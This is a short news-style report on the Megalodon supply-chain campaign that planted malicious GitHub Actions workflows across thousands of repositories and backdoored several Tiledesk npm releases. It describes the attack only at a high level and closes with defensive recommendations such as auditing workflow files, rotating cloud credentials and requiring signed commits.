5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours

Supply‑chain attacks have moved from occasional incidents to automated, high‑velocity campaigns, and the Megalodon operation underscores that shift. By targeting the ubiquitous GitHub platform, the attackers leveraged the trust developers place in CI/CD pipelines, inserting malicious workflow files that remain dormant until triggered via the GitHub API. The scale—over five thousand repositories in a single six‑hour window—places this breach among the most extensive ever recorded, rivaling the contemporaneous TeamPCP intrusion that exploited a compromised VS Code extension.

Technically, Megalodon’s two primary payloads—SysDiag and Optimize‑Build—demonstrate sophisticated use of GitHub Actions. SysDiag drops a .github/workflows/ci.yml file that runs a data‑stealing script on every push, while Optimize‑Build overwrites existing system files and employs the workflow_dispatch command to keep the malicious code hidden from build logs. The attack’s impact was visible in the Tiledesk case, where seven successive npm package versions (2.18.6‑2.18.12) were published with embedded backdoors, potentially exposing downstream users to credential theft. The malware’s ability to harvest AWS, Google Cloud, and Azure keys and relay them to a C2 server amplifies the risk, as compromised tokens can impersonate GitHub Actions and gain unfettered access to linked cloud resources.

For development teams, the Megalodon episode is a stark reminder to treat third‑party code changes as potential attack vectors. Immediate steps include auditing recent commits for unauthorized workflow files, revoking and rotating all cloud service credentials, and tightening CI/CD permissions to require signed commits. Industry‑wide, the incident is likely to accelerate adoption of provenance tools and signed GitHub Actions, as organizations seek to verify the authenticity of code before it reaches production. Continuous monitoring and rapid incident response will become essential components of a resilient software supply chain.